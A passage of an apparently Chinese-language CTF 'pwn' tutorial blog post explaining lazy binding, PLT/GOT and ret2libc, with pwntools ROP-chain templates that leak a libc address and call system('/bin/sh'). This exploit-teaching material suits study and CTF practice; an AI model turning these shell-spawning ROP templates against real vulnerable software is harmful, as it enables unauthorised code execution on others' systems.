  -<span class="token operator">></span> Package saved to libs/2.38-1ubuntu6_i386/.debug<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h5 id="ldd"><a href="#ldd" class="headerlink" title="ldd"></a>ldd</h5><p>获取可执行文件的动态链接文件，包括<code>ld</code>和<code>libc</code>等</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token variable">$ldd</span> ./pwn<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h5 id="patchelf"><a href="#patchelf" class="headerlink" title="patchelf"></a>patchelf</h5><p>更改可执行文件的动态链接文件，更改<code>ld</code>可以直接指定<code>ld</code>文件，而更改<code>libc</code>需要先使用<code>ldd</code>查看原<code>libc</code>作为<code>--replace-needed</code>选项的第一个参数，一般默认是<code>libc.so.6</code></p>
<p><strong>libc和ld要同时更改确保在同一版本</strong></p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token variable">$patchelf</span> --replace-needed libc.so.6 ./2.38/libc.so.6 ./pwn		<span class="token comment">#更改libc</span>
<span class="token variable">$patchelf</span> --set-interpreter ./2.35/ld-linux-x86-64.so.2 ./pwn	<span class="token comment">#更改ld</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<h5 id="onegadget"><a href="#onegadget" class="headerlink" title="onegadget"></a>onegadget</h5><p>能直接<code>getshell</code>的<code>gadget</code>，<u>添加参数<code>-l2</code>可以获得更多</u></p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token variable">$one_gadget</span> ./libc.so.6<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h4 id="延迟绑定"><a href="#延迟绑定" class="headerlink" title="延迟绑定"></a>延迟绑定</h4><p>参考文章：<a href="https://starrysky1004.github.io/2024/09/26/linux-yan-chi-bang-ding-ji-zhi-guo-cheng/linux-yan-chi-bang-ding-ji-zhi-guo-cheng/">https://starrysky1004.github.io/2024/09/26/linux-yan-chi-bang-ding-ji-zhi-guo-cheng/linux-yan-chi-bang-ding-ji-zhi-guo-cheng/</a></p>
<p>延迟绑定是一种在程序运行时才解析<strong>外部符号</strong>（如函数和变量）地址的技术，它允许程序在启动时不必立即加载所有动态链接库中的符号，从而提高程序的启动速度</p>
<p><code>c</code>语言内置的函数(例如<code>printf</code>）都是依赖于<code>libc</code>中的外部函数</p>
<h5 id="动态链接与静态链接"><a href="#动态链接与静态链接" class="headerlink" title="动态链接与静态链接"></a>动态链接与静态链接</h5><p><strong>动态链接</strong>是指在程序运行时才将程序与所需的动态链接库中的库函数链接起来的过程，动态链接的程序在启动时会加载所需的动态库（例如<code>libc</code>），并在运行时解析外部符号的地址</p>
<p><strong>静态链接</strong>在编译时将所有需要的库函数直接复制到可执行文件中，生成的可执行文件不依赖于外部的库文件，可以独立运行，但是会导致可执行文件体积增大</p>
<h5 id="plt与got"><a href="#plt与got" class="headerlink" title="plt与got"></a>plt与got</h5><p><strong>PLT（Procedure Linkage Table）</strong> 是一个代码段，包含了用于动态链接的跳转指令。每个需要动态链接的外部函数都会在<code>PLT</code>中有一个条目，当程序第一次调用这个函数时，<code>PLT</code>中的代码会被执行，这个代码会去查找并解析外部函数的实际地址，并将其存储在<code>GOT</code>中，以便后续调用时直接跳转到正确的地址</p>
<p><strong>GOT（Global Offset Table）</strong> 是一个数据段，存储了所有外部符号的地址。在程序启动时，<code>GOT</code>中的条目可能并不包含最终的地址，而是包含指向<code>PLT</code>中相应条目的指针。当<code>PLT</code>条目第一次被执行时，会将查找到的外部符号地址更新到<code>GOT</code>中，这样后续的调用就可以直接通过<code>GOT</code>找到正确的地址</p>
<h5 id="延迟绑定过程"><a href="#延迟绑定过程" class="headerlink" title="延迟绑定过程"></a>延迟绑定过程</h5><ol>
<li><strong>程序启动</strong>：程序启动时，动态链接器加载程序和所有依赖的动态库</li>
<li><strong>符号解析</strong>：当程序第一次调用一个外部函数时，<code>PLT</code>中的代码会被执行，查找并解析外部函数的实际地址</li>
<li><strong>地址存储</strong>：查找到的地址被存储在<code>GOT</code>中，以便后续调用</li>
<li><strong>直接调用</strong>：后续对同一外部函数的调用将直接通过<code>GOT</code>进行，无需再次解析</li>
</ol>
<h5 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h5><ul>
<li>执行函数的<code>plt</code>会通过跳转<code>got</code>直接调用到该函数</li>
<li><code>got</code>表可写的情况下覆盖函数的<code>got</code>表为其他函数地址可以实现调用该函数时执行到其他函数</li>
</ul>
<h3 id="ret2libc"><a href="#ret2libc" class="headerlink" title="ret2libc"></a>ret2libc</h3><p>目标是执行<code>system(&quot;/bin/sh&quot;);</code>，即执行<code>system</code>函数其一参为<code>&quot;/bin/sh&quot;</code></p>
<h4 id="有system和-x2F-bin-x2F-sh"><a href="#有system和-x2F-bin-x2F-sh" class="headerlink" title="有system和&#x2F;bin&#x2F;sh"></a>有system和&#x2F;bin&#x2F;sh</h4><p>延迟绑定部分提到，执行函数的<code>plt</code>可以直接调用到该函数，那么构造<code>rop</code>链就是要先控制一参<code>rdi</code>为<code>&quot;/bin/sh&quot;</code>的地址再填<code>system</code>的<code>plt</code></p>
<ul>
<li><p>控制一参</p>
<p>使用<code>ROPgadget</code>找到<code>pop rdi</code>的地址</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token variable">$ROPgadget</span> <span class="token parameter variable">--binary</span> ./pwn <span class="token parameter variable">--only</span> <span class="token string">'pop|ret'</span> <span class="token operator">|</span> <span class="token function">grep</span> <span class="token string">'rdi'</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>ps：<code>gadget</code>中含有<code>pop rdi</code>就行，但是有<code>pop</code>其他寄存器就需要在后面加上对应的值，例如<code>0x000ac112 : pop rdi ; pop rbx ; ret</code>，<code>pop rdi</code>之后还<code>pop rbx</code>，所以后面需要加两个地址，即<code>p64(0x000ac112) + p64(rdi_content) + p64(rbx_content)</code>，后面就可以继续加其他<code>gadget</code></p>
</li>
<li><p>找<code>&quot;/bin/sh&quot;</code>地址</p>
<p><code>&quot;/bin/sh&quot;</code>地址需要在<code>IDA</code>中查找，直接按<code>f12</code>找到对应地址</p>
</li>
<li><p>找<code>system</code>函数地址</p>
<p><code>pwntools</code>中可以直接获取<code>plt</code>和<code>got</code>的地址：<code>elf.plt[&#39;system&#39;]</code>	<code>elf.got[&#39;system&#39;]</code></p>
</li>
</ul>
<p>最终构造出</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token comment">#ROPgadget --binary ./pwn --only 'pop|ret' | grep 'rdi' -> pop_rdi_ret</span>
pop_rdi_ret <span class="token operator">=</span> 
bin_sh <span class="token operator">=</span> IDA中<span class="token operator">/</span><span class="token builtin">bin</span><span class="token operator">/</span>sh地址
system_plt <span class="token operator">=</span> elf<span class="token punctuation">.</span>plt<span class="token punctuation">[</span><span class="token string">'system'</span><span class="token punctuation">]</span>
p <span class="token operator">=</span> <span class="token string">b'a'</span> <span class="token operator">*</span> ? <span class="token operator">+</span> p64<span class="token punctuation">(</span>pop_rdi_ret<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>bin_sh<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>system_plt<span class="token punctuation">)</span>
r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>p<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="有system无-x2F-bin-x2F-sh"><a href="#有system无-x2F-bin-x2F-sh" class="headerlink" title="有system无&#x2F;bin&#x2F;sh"></a>有system无&#x2F;bin&#x2F;sh</h4><p>缺少<code>/bin/sh</code>可以直接往程序中的一个地址写入<code>/bin/sh</code>，假设地址是<code>buf</code>，那么就要先构造<code>gets(buf)</code>，读取<code>/bin/sh</code>之后再执行<code>system(&#39;/bin/sh&#39;)</code>，其中<code>system</code>的一参就说<code>buf</code>，即<code>/bin/sh</code>的地址</p>
<ul>
<li>获取<code>gets</code>的<code>plt</code>地址：<code>elf.plt[&#39;gets&#39;]</code></li>
<li>设置<code>buf</code>的地址，从<code>IDA</code>中选取，可以从<code>bss</code>段中选取地址</li>
<li>获取<code>system</code>的<code>plt</code>地址：<code>elf.plt[&#39;system&#39;]</code></li>
<li>设置一参：<code>ROPgadget --binary ./pwn --only &#39;pop|ret&#39; | grep &#39;rdi&#39;</code></li>
</ul>
<p>最终构造：注意发送<code>/bin/sh</code>最后加上<code>\x00</code>截断字符串，在执行<code>rop</code>链的过程中会执行<code>gets(buf)</code>从输入流输入<code>buf</code>的值，此时输入<code>/bin/sh\x00</code>即可向<code>buf</code>输入字符串</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token comment">#ROPgadget --binary ./pwn --only 'pop|ret' | grep 'rdi' -> pop_rdi_ret</span>
pop_rdi_ret <span class="token operator">=</span> 
buf <span class="token operator">=</span> 
gets_plt <span class="token operator">=</span> elf<span class="token punctuation">.</span>plt<span class="token punctuation">[</span><span class="token string">'gets'</span><span class="token punctuation">]</span>
system_plt <span class="token operator">=</span> elf<span class="token punctuation">.</span>plt<span class="token punctuation">[</span><span class="token string">'system'</span><span class="token punctuation">]</span>
p <span class="token operator">=</span> <span class="token string">b'a'</span> <span class="token operator">*</span> ?
p <span class="token operator">+=</span> p64<span class="token punctuation">(</span>pop_rdi_ret<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>buf<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>gets_plt<span class="token punctuation">)</span>	<span class="token comment">#gets(buf)</span>
p <span class="token operator">+=</span> p64<span class="token punctuation">(</span>pop_rdi_ret<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>buf<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>system_plt<span class="token punctuation">)</span>	<span class="token comment">#system(buf)</span>
r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>p<span class="token punctuation">)</span>
r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">'/bin/sh\x00'</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="无system无-x2F-bin-x2F-sh"><a href="#无system无-x2F-bin-x2F-sh" class="headerlink" title="无system无&#x2F;bin&#x2F;sh"></a>无system无&#x2F;bin&#x2F;sh</h4><p>可执行文件中没有<code>system</code>，但是作为动态链接库的<code>libc</code>中有，所以直接执行<code>libc</code>中的<code>system</code>即可，所以思路就是先获取<code>libc</code>的基址，再计算<code>libc</code>中<code>system</code>和<code>/bin/sh</code>的地址，最后执行<code>system(&#39;/bin/sh&#39;)</code></p>
<p><code>got</code>部分提到<code>got</code>表存放了外部符号地址，即<code>libc</code>中的地址，所以如果能够泄露<code>got</code>表中的地址就能获取<code>libc</code>中某个函数的真实地址，再减去这个函数在<code>libc</code>中的偏移就能得到<code>libc</code>的基址，最后加上<code>system</code>函数的偏移就能得到<code>system</code>函数的地址</p>
<ul>
<li><p>泄露<code>got</code>表中函数的地址</p>
<p>需要用一个输出函数输出一个<code>got</code>表的地址，一般构造<code>puts(puts_got)</code>，最后还要再回到该函数继续利用栈溢出，即<code>p64(pop_rdi_ret) + p64(puts_got) + p64(puts) + p64(main)</code></p>
<p>接收该地址：基本就是一个固定用法<code>u64(r.recvuntil(b&#39;\x7f&#39;)[-6:].ljust(8, b&#39;\x00&#39;))</code></p>
</li>
<li><p>获取<code>libc</code>基址</p>
<p>标志：64位以<code>7f</code>开头，基址末尾三位是0</p>
<p>已知<code>puts</code>函数的真实地址和<code>puts</code>函数的偏移，<code>libc</code>的基址就等于真实地址减偏移</p>
<p>获取<code>puts</code>函数在<code>libc</code>中的偏移可以通过<code>libc = ELF(&#39;libc文件&#39;)</code>，然后<code>libc.sym[&#39;puts&#39;]</code>得到<code>puts</code>偏移</p>
<p>在打本地的时候如果修改了<code>libc</code>版本需要对应修改<code>ELF</code>里的文件路径，也可以直接在本地打通之后修改文件路径为远程的<code>libc</code>文件后直接打远程</p>
</li>
<li><p>获取<code>system</code>和<code>/bin/sh</code>地址：从<code>libc</code>获取地址需要<strong>加上基址</strong></p>
<p><code>system = libc.sym[&#39;system&#39;] + libc_base</code></p>
<p><code>bin_sh = libc.search(b&#39;/bin/sh\x00&#39;).__next__() + libc_base</code></p>
</li>
</ul>
<p>最终构造：</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token comment">#ROPgadget --binary ./pwn --only 'pop|ret' | grep 'rdi' -> pop_rdi_ret</span>
pop_rdi_ret <span class="token operator">=</span> 
main <span class="token operator">=</span> elf<span class="token punctuation">.</span>sym<span class="token punctuation">[</span><span class="token string">'main'</span><span class="token punctuation">]</span>
puts_got <span class="token operator">=</span> elf<span class="token punctuation">.</span>got<span class="token punctuation">[</span><span class="token string">'puts'</span><span class="token punctuation">]</span>
puts_plt <span class="token operator">=</span> elf<span class="token punctuation">.</span>plt<span class="token punctuation">[</span><span class="token string">'puts'</span><span class="token punctuation">]</span>
p <span class="token operator">=</span> <span class="token string">b'a'</span> <span class="token operator">*</span> ? <span class="token operator">+</span> p64<span class="token punctuation">(</span>pop_rdi_ret<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>puts_got<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>puts_plt<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>main<span class="token punctuation">)</span>
r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>p<span class="token punctuation">)</span>

libc <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">'libc文件路径'</span><span class="token punctuation">)</span>
libc_base <span class="token operator">=</span> u64<span class="token punctuation">(</span>r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b'\x7f'</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token operator">-</span><span class="token number">6</span><span class="token punctuation">:</span><span class="token punctuation">]</span><span class="token punctuation">.</span>ljust<span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">,</span> <span class="token string">b'\x00'</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token operator">-</span> libc<span class="token punctuation">.</span>sym<span class="token punctuation">[</span><span class="token string">'puts'</span><span class="token punctuation">]</span>
system <span class="token operator">=</span> libc<span class="token punctuation">.</span>sym<span class="token punctuation">[</span><span class="token string">'system'</span><span class="token punctuation">]</span> <span class="token operator">+</span> libc_base
bin_sh <span class="token operator">=</span> libc<span class="token punctuation">.</span>search<span class="token punctuation">(</span><span class="token string">b'/bin/sh\x00'</span><span class="token punctuation">)</span><span class="token punctuation">.</span>__next__<span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token operator">+</span> libc_base
p <span class="token operator">=</span> <span class="token string">b'a'</span> <span class="token operator">*</span> ? <span class="token operator">+</span> p64<span class="token punctuation">(</span>pop_rdi_ret<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>bin_sh<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>system<span class="token punctuation">)</span>
r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>p<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="堆栈平衡"><a href="#堆栈平衡" class="headerlink" title="堆栈平衡"></a>堆栈平衡</h4><p>某些指令，如<code>movaps</code>（用于操作<code>XMM</code>寄存器），要求栈指针<code>RSP</code>必须是<code>16</code>字节对齐的，直接从返回地址开始写<code>rop</code>链可能会造成堆栈不平衡，需要在<code>rop</code>链前加上汇编指令<code>ret</code>平衡堆栈</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token variable">$ROPgadget</span> <span class="token parameter variable">--binary</span> ./pwn <span class="token parameter variable">--only</span> <span class="token string">'ret'</span>	<span class="token comment">#查找ret指令的地址</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h4 id="32位程序"><a href="#32位程序" class="headerlink" title="32位程序"></a>32位程序</h4><p>32位和64位的区别就是32位通过栈传参而不通过寄存器传参，所以不像64位需要找<code>pop rdi</code>的值，32位直接将需要调用的函数都放在一起最后放所有的参数，例如</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python">p <span class="token operator">=</span> <span class="token string">b'a'</span> <span class="token operator">*</span> ?
p <span class="token operator">+=</span> p64<span class="token punctuation">(</span>pop_rdi_ret<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>buf<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>gets<span class="token punctuation">)</span>	<span class="token comment">#gets(buf)</span>
p <span class="token operator">+=</span> p64<span class="token punctuation">(</span>pop_rdi_ret<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>buf<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>system<span class="token punctuation">)</span>	<span class="token comment">#system(buf)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>对应32位的程序</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python">p <span class="token operator">=</span> <span class="token string">b'a'</span> <span class="token operator">*</span> <span class="token punctuation">(</span><span class="token number">0x64</span> <span class="token operator">+</span> <span class="token number">0xc</span><span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span>gets_plt<span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span>system_plt<span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span>bss<span class="token punctuation">)</span> <span class="token operator">*</span> <span class="token number">2</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h4 id="例题"><a href="#例题" class="headerlink" title="例题"></a>例题</h4><p><a href="https://starrysky1004.github.io/ret2libc.zip">https://starrysky1004.github.io/ret2libc.zip</a></p>

                
            </div>
            <hr/>

            



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/pwn/">
                                    <span class="chip bg-color">pwn</span>
                                </a>
                            
                                <a href="/tags/%E6%95%99%E7%A8%8B/">
                                    <span class="chip bg-color">教程</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="far fa-dot-circle"></i>&nbsp;本篇
            </div>
            <div class="card">
                <a href="/2024/11/06/chong-sheng-zhi-wo-zai-yctu-zuo-pwn-shou-xi-lie-shi-pin-bi-ji/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/Steel%20Gray.jpg" class="responsive-img" alt="《重生之我在yctu做pwn手》系列视频笔记">
                        
                        <span class="card-title">《重生之我在yctu做pwn手》系列视频笔记</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            b站视频合集：https://space.bilibili.com/85923475/channel/collectiondetail?sid=3962232
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2024-11-06
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/pwn/" class="post-category">
                                    pwn
                                </a>
                            
                            
                        </span>
                    </div>
                </div>

                
                <div class="card-action article-tags">
                    
                    <a href="/tags/pwn/">
                        <span class="chip bg-color">pwn</span>
                    </a>
                    
                    <a href="/tags/%E6%95%99%E7%A8%8B/">
                        <span class="chip bg-color">教程</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2024/10/31/llvm-pass-shi-yong-c-bian-xie-exp/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/Steel%20Gray.jpg" class="responsive-img" alt="LLVM PASS PWN：使用c++编写exp">
                        
                        <span class="card-title">LLVM PASS PWN：使用c++编写exp</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            LLVM PASS：使用c++编写exp
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2024-10-31
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/pwn/" class="post-category">
                                    pwn
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/pwn/">
                        <span class="chip bg-color">pwn</span>
                    </a>
                    
                    <a href="/tags/llvm/">
                        <span class="chip bg-color">llvm</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
    <div class="container row center-align" style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2024</span>
            
            <span id="year">2019</span>
            <a href="/about" target="_blank">StarrySky</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">155.7k</span>&nbsp;字
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/starrysky1004" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:starrysky20041005@gmail.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=2726736810" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 2726736810" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>









    <a href="https://space.bilibili.com/85923475" class="tooltipped" target="_blank" data-tooltip="关注我的bilibili" data-position="top" data-delay="50">
        <i class="fas fa-video"></i>
    </a>
</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
